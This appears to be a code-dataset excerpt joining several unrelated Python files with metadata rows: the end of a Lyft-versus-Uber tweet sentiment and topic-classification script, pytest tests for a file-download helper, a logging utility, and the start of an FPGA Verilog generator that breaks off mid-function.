plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NBC Topic '+str(topic)+': Highly Correlated, Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Financial_NBC.png")
plt.show()
topic = 'service'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 1)
plt.title('NBC Topic '+str(topic)+': Highly Correlated, Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Service_NBC.png")
plt.show()
topic = 'promotional'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
lumerge = pd.merge(left = lyftscoresdf, right = uberscoresdf, on = 'date', how = 'left')
fig = plt.figure(figsize = (10,8))
plt.plot(lumerge['compound_x'], label = 'Lyft Average Sentiment')
plt.plot(lumerge['compound_y'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.ylim((-.2,1.2))
plt.legend(loc = 2)
plt.title('NBC Topic '+str(topic)+': Few Uber Tweets Classified Promotional')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Promotional_NBC.png")
plt.show()
topic = 'news'
lyftdf2 = lyftdf1[lyftdf1['NB_label']==topic]
uberdf2 = uberdf1[uberdf1['NB_label']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10,8))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_News_NBC.png")
plt.show()
##Classification with Tensor Flow and Sentence Convolution
#1327 - 1437
#Total Corpus of Words
txt_twt = tweetdf['processed_docs']
corpusdf = pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+corpuslist[0])
for i in corpuslist[1:]:
corpusdf = corpusdf.append(pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+i))
corpusdf['final_tweets'] = corpusdf['final_tweets'].fillna(" ")
corpusdf['processed_docs'] = corpusdf['final_tweets'].map(preprocess)
twtcrp = corpusdf['processed_docs']
#txt_twt = txt_twt.fillna([" "])
#twtcrp = twtcrp.fillna([" "])
wds = []
for i in txt_twt:
for j in i:
try:
wds.append(j)
except:
pass
for i in twtcrp:
for j in i:
try:
wds.append(j)
except:
pass
dat = pd.DataFrame()
dat['wds'] = wds
dat['cnt'] = 1
UWs = pd.pivot_table(data = dat, index = ['wds'],values = ['cnt'], aggfunc = 'sum' )
UWs['rng'] = list(range(len(UWs)))
UWs.drop(['cnt'], inplace = True, axis = 1)
uwdict = UWs.to_dict()
uwdict = uwdict['rng']
twtcrp.reset_index(inplace= True, drop = True)
ls = []
for i in twtcrp:
ls.append(len(i))
maxes = max(ls)
nndocs = []
for i in twtcrp:
tmp = []
for j in i:
try:
tmp.append(uwdict[j])
except:
tmp.append(-1)
lentemp = len(tmp)
for k in range(maxes-lentemp):
tmp.append(-1)
nndocs.append(np.array(tmp))
nndf = pd.DataFrame(nndocs)
nndocs2 = np.array(nndf)
nndocs2.shape
labs = np.array(corpusdf['label'])
labs.shape
#nndocs = nndocs.transpose()
encoder2 = LabelEncoder()
encoder2.fit(labs)
encoded_Ytrain = encoder2.transform(labs)
# convert integers to dummy variables (i.e. one hot encoded)
dummy_labs = np_utils.to_categorical(encoded_Ytrain)
#dummy_labs = dummy_labs.reshape(13898, 4,1)
dummy_labs.shape
nndocs2= nndocs2.reshape(13898,1,38)
dummy_labs= dummy_labs.reshape(13898,1,4)
nndocs2[0].shape
# kernel_size=(4,1)
nndocs2= nndocs2.reshape(13898,1,1,1,38)
dummy_labs= dummy_labs.reshape(13898,1,1,1,4)
nndocs2= nndocs2.reshape(13898,1,38)
dummy_labs= dummy_labs.reshape(13898,1,4)
IS = nndocs2[0].shape
model = keras.Sequential()
'''model.add(keras.layers.Conv1D(40,kernel_size = (4),activation='sigmoid',input_shape=(None,787), padding='same'))
model.add(keras.layers.Dense(299, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(15, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.relu))'''
'''model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Conv1D(40,kernel_size = (6),strides = 1,activation='relu',input_shape=(None,38), padding='same'))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.sigmoid))'''
#model.add(keras.layers.ConvLSTM2D(120,input_shape=(None,None,None,38), kernel_size = (6), strides=(1), padding='same', data_format=None, dilation_rate=1, activation='tanh', recurrent_activation='hard_sigmoid', use_bias=True, kernel_initializer='glorot_uniform', recurrent_initializer='orthogonal', bias_initializer='zeros', unit_forget_bias=True, kernel_regularizer=None, recurrent_regularizer=None, bias_regularizer=None, activity_regularizer=None, kernel_constraint=None, recurrent_constraint=None, bias_constraint=None, return_sequences=True, go_backwards=True, stateful=False, dropout=0.0, recurrent_dropout=0.0))
model.add(keras.layers.LSTM(120, activation='tanh', recurrent_activation='hard_sigmoid', \
use_bias=True, kernel_initializer='glorot_uniform', recurrent_initializer='orthogonal',
bias_initializer='zeros', unit_forget_bias=True, kernel_regularizer=None,
recurrent_regularizer=None, bias_regularizer=None, activity_regularizer=None,
kernel_constraint=None, recurrent_constraint=None, bias_constraint=None,
dropout=0.0, recurrent_dropout=0.0, implementation=1, return_sequences=True,
return_state=False, go_backwards=False, stateful=False, unroll=False))
model.add(keras.layers.Dense(120, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(38, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.sigmoid))
model.compile(optimizer=tensorflow.train.AdamOptimizer(),
loss=losses.mean_squared_error,
metrics=['accuracy'])
#model.summary()
model.fit(nndocs2, dummy_labs, epochs=300, verbose = 1)
predresult = model.predict(nndocs2)
result_vecttrain = []
for i in predresult:
result_vecttrain.append(np.argmax(i))
ylabnum = []
for i in dummy_labs:
ylabnum.append(np.argmax(i))
resdf = pd.DataFrame()
resdf['ylab'] = ylabnum
resdf['pred'] = result_vecttrain
resdf['res'] = np.where(resdf['ylab']==resdf['pred'],1,0)
#This model has no predictive power.. redoing with common word TF matrix
#np.mean(resdf['res'] )
#model.summary()
#NN with TF word mapping
#1449 - 1749
txt_twt = list(tweetdf['processed_docs'])
corpusdf = pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+corpuslist[0])
for i in corpuslist[1:]:
corpusdf = corpusdf.append(pd.read_csv("C://Users/jliv/Downloads/tweets/corpus/"+i))
corpusdf['final_tweets'] = corpusdf['final_tweets'].fillna(" ")
corpusdf['processed_docs'] = corpusdf['final_tweets'].map(preprocess)
twtcrp = list(corpusdf['processed_docs'])
twtcrp_fin = list(corpusdf['final_tweets'])
#txt_twt = txt_twt.fillna([" "])
#twtcrp = twtcrp.fillna([" "])
wds = []
for i in txt_twt:
for j in i:
try:
wds.append(j)
except:
pass
wds = []
for i in twtcrp:
for j in i:
try:
wds.append(j)
except:
pass
dat = pd.DataFrame()
dat['wds'] = wds
dat['cnt'] = 1
UWs = pd.pivot_table(data = dat, index = ['wds'],values = ['cnt'], aggfunc = 'sum' )
UWs = UWs.sort_values(by = 'cnt', ascending = False)
UWs.reset_index(inplace= True, drop = False)
UWs2 = UWs[:300]
ww = UWs.copy()
ww.reset_index(inplace= True)
ww = list(ww[(ww['cnt'] >= 20)&(ww['cnt'] <= 30)]['wds'])
WL = list(UWs2['wds'])+ww
twtcrp = list(twtcrp)
#==============================================================================
# Xdf = pd.DataFrame()
# for i in WL:
# Xdf[i] = [0]
#==============================================================================
Xdf = pd.DataFrame()
Xdf['twtcrp'] = twtcrp
Xdf['twtcrp_fin'] = twtcrp_fin
for i in WL:
Xdf[i] = np.where(Xdf['twtcrp_fin'].str.contains(i),1,0)
#Xdf.drop(['twtcrp_fin','twtcrp','y'], inplace= True, axis = 1)
Xdf.drop(['twtcrp_fin','twtcrp'], inplace= True, axis = 1)
Xarray = np.array(Xdf)
labs = np.array(corpusdf['label'])
labs.shape
#nndocs = nndocs.transpose()
encoder2 = LabelEncoder()
encoder2.fit(labs)
encoded_Ytrain = encoder2.transform(labs)
# convert integers to dummy variables (i.e. one hot encoded)
dummy_labs = np_utils.to_categorical(encoded_Ytrain)
#dummy_labs = dummy_labs.reshape(13898, 4,1)
dummy_labs.shape
Xarray.shape
Xarray= Xarray.reshape(13898,1,787)
dummy_labs= dummy_labs.reshape(13898,1,4)
Xarray[0].shape
# kernel_size=(4,1)
IS = nndocs2[0].shape
model = keras.Sequential()
'''model.add(keras.layers.Conv1D(40,kernel_size = (4),activation='sigmoid',input_shape=(None,787), padding='same'))
model.add(keras.layers.Dense(299, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(15, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.relu))'''
model.add(keras.layers.Dense(787, activation=tensorflow.nn.relu))
model.add(keras.layers.Dense(300, activation=tensorflow.nn.sigmoid))
model.add(keras.layers.Dense(100, activation=tensorflow.nn.sigmoid))
model.add(keras.layers.Dense(25, activation=tensorflow.nn.sigmoid))
model.add(keras.layers.Dense(4, activation=tensorflow.nn.sigmoid))
#model.add(keras.layers.Dense(3, activation=tensorflow.keras.activations.linear))
model.compile(optimizer=tensorflow.train.AdamOptimizer(),
loss=losses.mean_squared_error,
metrics=['accuracy'])
#model.summary()
model.fit(Xarray, dummy_labs, epochs=100, verbose = 1)
predresult = model.predict(Xarray)
result_vecttrain = []
for i in predresult:
result_vecttrain.append(np.argmax(i))
ylabnum = []
for i in dummy_labs:
ylabnum.append(np.argmax(i))
resdf = pd.DataFrame()
resdf['ylab'] = ylabnum
resdf['pred'] = result_vecttrain
resdf['res'] = np.where(resdf['ylab']==resdf['pred'],1,0)
np.mean(resdf['res'])
ylabs = pd.DataFrame()
ylabs['Y'] = labs
ylabs['num'] = ylabnum
ylabs = pd.pivot_table(data = ylabs, index = ['Y'], values = ['num'], aggfunc = 'mean')
ylabs.reset_index(inplace= True, drop = False)
ylabs.set_index('num', inplace=True)
labelmap = ylabs.to_dict()['Y']
txt_twt = list(tweetdf['processed_docs'])
txt_twt_fin = list(tweetdf['final_tweets'])
Xdf = pd.DataFrame()
Xdf['txt_twt'] = txt_twt
Xdf['txt_twt_fin'] = txt_twt_fin
for i in WL:
Xdf[i] = np.where(Xdf['txt_twt_fin'].str.contains(i),1,0)
#Xdf.drop(['txt_twt_fin','txt_twt','y'], inplace= True, axis = 1)
Xdf.drop(['txt_twt_fin','txt_twt'], inplace= True, axis = 1)
Xtest = np.array(Xdf)
Xtest= Xtest.reshape(3400,1,787)
predresult = model.predict(Xtest)
result_vecttrain = []
for i in predresult:
result_vecttrain.append(np.argmax(i))
resdf = pd.DataFrame()
resdf['pred'] = result_vecttrain
tweetdf['nn_label'] = resdf['pred']
tweetdf['nn_label_val'] = tweetdf['nn_label'].map(labelmap)
pd.pivot_table(data = tweetdf, index = ['NB_label'], values = ['nn_label_lstm'], aggfunc = 'count')
pd.pivot_table(data = tweetdf, index = ['nn_label_val'], values = ['nn_label'], aggfunc = 'count')
tweetdf.to_csv("C://Users/jliv/downloads/tweets/tweets_final_models.csv")
#Graph classified tweets sentiment
tweetdf = pd.read_csv("C://Users/jliv/downloads/tweets/tweets_final_models.csv")
lyftdf1 = tweetdf[tweetdf['comp']=='lyft']
uberdf1 = tweetdf[tweetdf['comp']=='uber']
topic = 'financial'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_Financial_NN.png")
plt.show()
topic = 'service'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_service_NN.png")
plt.show()
topic = 'promotional'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
lumerge = pd.merge(left = lyftscoresdf, right = uberscoresdf, on = 'date', how = 'left')
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lumerge['compound_x'], label = 'Lyft Average Sentiment')
plt.plot(lumerge['compound_y'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.ylim((-.2,1.2))
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Lyft with Stronger Sustained Sentiment, Uber not as Promotional')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_promotional_NN.png")
plt.show()
topic = 'news'
lyftdf2 = lyftdf1[lyftdf1['nn_label_val']==topic]
uberdf2 = uberdf1[uberdf1['nn_label_val']==topic]
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf2, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic '+str(topic)+': Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_news_NN.png")
plt.show()
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['nn_label_val'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['nn_label_val'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(4),list(lyftscoresdf['nn_label_val']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic Model: Lyft stronger in Financial, Promotional and Service Sentiment')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Sentiment_Topics_NN.png")
plt.show()
#lyftdf2 = lyftdf
#uberdf2 = uberdf
lyftscoresdf = pd.pivot_table(data = lyftdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
uberscoresdf = pd.pivot_table(data = uberdf1, index = ['date'], values = ['compound'], aggfunc = 'mean' )
lyftscoresdf.reset_index(inplace = True, drop = False)
uberscoresdf.reset_index(inplace = True, drop = False)
fig = plt.figure(figsize = (10.5,7.5))
plt.plot(lyftscoresdf['compound'], label = 'Lyft Average Sentiment')
plt.plot(uberscoresdf['compound'], label = 'Uber Average Sentiment')
plt.xticks(range(17),list(lyftscoresdf['date']), rotation = 45)
plt.legend(loc = 2)
plt.title('NN Topic All: Not Meaningfully Different')
plt.savefig("C://Users/jliv/Documents/GitHub/JLivingston01.github.io/images/Time_Sentiment_NN.png")
plt.show() | 31.587328 | 618 | 0.684586 | 7,833 | 57,331 | 4.887527 | 0.091791 | 0.006478 | 0.00909 | 0.020061 | 0.810678 | 0.795946 | 0.777244 | 0.765437 | 0.756112 | 0.740544 | 0 | 0.023704 | 0.140517 | 57,331 | 1,815 | 619 | 31.587328 | 0.75308 | 0.116656 | 0 | 0.723104 | 0 | 0.016755 | 0.187622 | 0.070871 | 0 | 0 | 0 | 0 | 0 | 1 | 0.007937 | false | 0.007055 | 0.022928 | 0.002646 | 0.038801 | 0.006173 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da2038ed06d2fd592a809b42164bed4a8d22ea34 | 3,948 | py | Python | test_app.py | joepreludian/recrutatech_devops_ia | 5176e214e3757fa35c99fe21903a371aafd23cc0 | [
"MIT"
] | 3 | 2019-09-24T00:51:24.000Z | 2020-02-18T03:27:49.000Z | test_app.py | joepreludian/recrutatech_devops_ia | 5176e214e3757fa35c99fe21903a371aafd23cc0 | [
"MIT"
] | 5 | 2019-09-09T01:42:23.000Z | 2021-08-23T20:24:10.000Z | test_app.py | joepreludian/recrutatech_devops_ia | 5176e214e3757fa35c99fe21903a371aafd23cc0 | [
"MIT"
] | null | null | null | import os
import pytest
from pathlib import Path
from app import \
get_downloaded_base156, get_latest_csv_url_from_156, download_file
@pytest.fixture
def supply_download_data():
return {
'url': 'https://www.google.com.br/intl/pt-BR/add_url.html',
'temp_name': 'temp_name',
'temp_dir': 'source_data'
}
def test_get_url_156():
url = get_latest_csv_url_from_156()
assert 'Base_de_Dados.csv' in url
# assert 'ISO-8859-1' in charset
def test_download_simple_file(supply_download_data):
filename, encoding = download_file(url=supply_download_data['url'])
assert filename == 'add_url.html'
assert os.path.isfile(filename) is True
os.unlink('add_url.html') # Cleaning up file
def test_download_file_with_override(supply_download_data):
filename, encoding = download_file(
url=supply_download_data['url'],
name_override=supply_download_data['temp_name'])
assert filename == supply_download_data['temp_name']
assert os.path.isfile(filename) is True
os.unlink(filename)
def test_download_file_with_folder(supply_download_data):
filename, encoding = download_file(
url=supply_download_data['url'],
folder=supply_download_data['temp_dir'])
assert filename == f'{supply_download_data["temp_dir"]}/add_url.html'
assert os.path.isfile(filename) is True
os.unlink(filename)
def test_download_file_with_folder_and_name_override(supply_download_data):
filename, encoding = download_file(
url=supply_download_data['url'],
folder=supply_download_data['temp_dir'],
name_override=supply_download_data['temp_name'])
assert filename == f'{supply_download_data["temp_dir"]}/' \
f'{supply_download_data["temp_name"]}'
assert os.path.isfile(filename) is True
os.unlink(filename)
def test_download_no_overwrite(supply_download_data):
filename, encoding = download_file(
url=supply_download_data['url'],
folder=supply_download_data['temp_dir'],
name_override=supply_download_data['temp_name'])
assert filename == f'{supply_download_data["temp_dir"]}/' \
f'{supply_download_data["temp_name"]}'
assert os.path.isfile(filename) is True
Path(filename).touch()
file_stats_touched = os.stat(filename)
assert type(file_stats_touched.st_mtime) is float
# Downloading again and comparises if the file was overwritten
filename, encoding = download_file(
url=supply_download_data['url'],
folder=supply_download_data['temp_dir'],
name_override=supply_download_data['temp_name'],
force_overwrite=False)
file_stats_new = os.stat(filename)
assert file_stats_touched.st_mtime == file_stats_new.st_mtime
os.unlink(filename)
def test_download_with_overwrite(supply_download_data):
filename, encoding = download_file(
url=supply_download_data['url'],
folder=supply_download_data['temp_dir'],
name_override=supply_download_data['temp_name'])
assert filename == f'{supply_download_data["temp_dir"]}/' \
f'{supply_download_data["temp_name"]}'
assert os.path.isfile(filename) is True
Path(filename).touch()
file_stats_touched = os.stat(filename)
assert type(file_stats_touched.st_mtime) is float
# Downloading again and comparises if the file was overwritten
filename, encoding = download_file(
url=supply_download_data['url'],
folder=supply_download_data['temp_dir'],
name_override=supply_download_data['temp_name'],
force_overwrite=True)
file_stats_new = os.stat(filename)
assert file_stats_touched.st_mtime != file_stats_new.st_mtime
os.unlink(filename)
def test_get_base156():
filename, encoding = get_downloaded_base156()
assert filename == 'source_data/base156.csv'
assert os.path.isfile(filename)
| 29.029412 | 75 | 0.712513 | 522 | 3,948 | 5.030651 | 0.149425 | 0.186596 | 0.239909 | 0.167555 | 0.837395 | 0.817212 | 0.797411 | 0.797411 | 0.782178 | 0.762376 | 0 | 0.008077 | 0.18465 | 3,948 | 135 | 76 | 29.244444 | 0.807704 | 0.042806 | 0 | 0.588235 | 0 | 0 | 0.144409 | 0.074192 | 0 | 0 | 0 | 0 | 0.223529 | 1 | 0.105882 | false | 0 | 0.047059 | 0.011765 | 0.164706 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
da3d491262710096d77b1b2f9c3126e017e7d2c2 | 701 | py | Python | printutils.py | david-gonzalez/aprendizaje-profundo | 2d18e573a83a8944a20f0064885abe11ed6022f2 | [
"MIT"
] | null | null | null | printutils.py | david-gonzalez/aprendizaje-profundo | 2d18e573a83a8944a20f0064885abe11ed6022f2 | [
"MIT"
] | null | null | null | printutils.py | david-gonzalez/aprendizaje-profundo | 2d18e573a83a8944a20f0064885abe11ed6022f2 | [
"MIT"
] | null | null | null | import datetime
def print_line(args):
if args.verbose == 1:
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S ") + '-' * 72 )
def print_message(msg,args):
if args.verbose == 1:
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
def print_new_process(msg,args):
if args.verbose == 1:
print_line(args)
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
def print_end(msg,args):
if args.verbose == 1:
print_line(args)
print( datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") + ' - ' + str(msg) )
print_line(args)
| 33.380952 | 97 | 0.527817 | 98 | 701 | 3.693878 | 0.234694 | 0.088398 | 0.143646 | 0.187845 | 0.809392 | 0.809392 | 0.809392 | 0.801105 | 0.801105 | 0.801105 | 0 | 0.011605 | 0.262482 | 701 | 20 | 98 | 35.05 | 0.688588 | 0 | 0 | 0.625 | 0 | 0 | 0.112696 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.0625 | 0 | 0.3125 | 0.6875 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
e51d143fcc1f9b769bb137edded5d93ea021f629 | 39,586 | py | Python | vtr/vtr_flow/tools/fpgaGen/fpgaGen.py | haojunliu/OpenFPGA | b0c4f27077f698aae59bbcbd3ca002f22ba2a5a1 | [
"BSD-2-Clause"
] | 31 | 2016-02-15T02:57:28.000Z | 2021-06-02T10:40:25.000Z | vtr/vtr_flow/tools/fpgaGen/fpgaGen.py | haojunliu/OpenFPGA | b0c4f27077f698aae59bbcbd3ca002f22ba2a5a1 | [
"BSD-2-Clause"
] | null | null | null | vtr/vtr_flow/tools/fpgaGen/fpgaGen.py | haojunliu/OpenFPGA | b0c4f27077f698aae59bbcbd3ca002f22ba2a5a1 | [
"BSD-2-Clause"
] | 6 | 2017-02-08T21:51:51.000Z | 2021-06-02T10:40:40.000Z | import sys
import shlex
import math
import route_modules
def generate_verilog_fpga_header(fpga_tile_fp, num_io_in, num_io_out, num_configs_in, num_configs_en):
num_top_in = num_io_in - 1
num_bop_in = num_io_in - 1
num_left_in = num_io_in - 1
num_right_in = num_io_in - 1
num_top_out = num_io_out - 1
num_bop_out = num_io_out - 1
num_left_out = num_io_out - 1
num_right_out = num_io_out - 1
line_to_print = 'module fpga(\n'
line_to_print = line_to_print + ' input [' + str(num_top_in) + ':0] top_in,\n'
line_to_print = line_to_print + ' input [' + str(num_bop_in) + ':0] bot_in,\n'
line_to_print = line_to_print + ' input [' + str(num_left_in) + ':0] left_in,\n'
line_to_print = line_to_print + ' input [' + str(num_right_in) + ':0] right_in,\n'
line_to_print = line_to_print + ' output [' + str(num_top_out) + ':0] top_out,\n'
line_to_print = line_to_print + ' output [' + str(num_bop_out) + ':0] bot_out,\n'
line_to_print = line_to_print + ' output [' + str(num_left_out) + ':0] left_out,\n'
line_to_print = line_to_print + ' output [' + str(num_right_out) + ':0] right_out,\n'
line_to_print = line_to_print + ' input [' + str(num_configs_in-1) + ':0] configs_in,\n'
line_to_print = line_to_print + ' input [' + str(num_configs_en-1) + ':0] configs_en,\n'
line_to_print = line_to_print + ' input ff_en, clock, rst\n);\n\n'
fpga_tile_fp.write(line_to_print)
def generate_verilog_wires(fpga_tile_fp, fpga_route, const_node_count):
fpga_tile_fp.write(' // Interconnection Wire Declaration\n')
for i in range (0, const_node_count):
if fpga_route[i].r_type == route_modules.R_TYPE_OPIN or fpga_route[i].r_type == route_modules.R_TYPE_CHANX or fpga_route[i].r_type == route_modules.R_TYPE_CHANY:
line_to_print = ' wire wire_' + str(i) + ';\n'
fpga_tile_fp.write(line_to_print)
def generate_wires(fpga_tile_fp, fpga_route, const_node_count):
fpga_tile_fp.write('\n\n // Interconnection Wire Declaration\n')
for i in range (0, const_node_count):
if fpga_route[i].r_type == route_modules.R_TYPE_OPIN or fpga_route[i].r_type == route_modules.R_TYPE_CHANX or fpga_route[i].r_type == route_modules.R_TYPE_CHANY:
line_to_print = ' val wire_' + str(i) + ' = Bits(1)\n'
fpga_tile_fp.write(line_to_print)
def generate_fpga_configs_in(fpga_tile_fp, x_size, y_size):
fpga_tile_fp.write('\n\n // FPGA TILE CONFIG_IN\n')
# EDGE
for x_cor in range (1, x_size + 1):
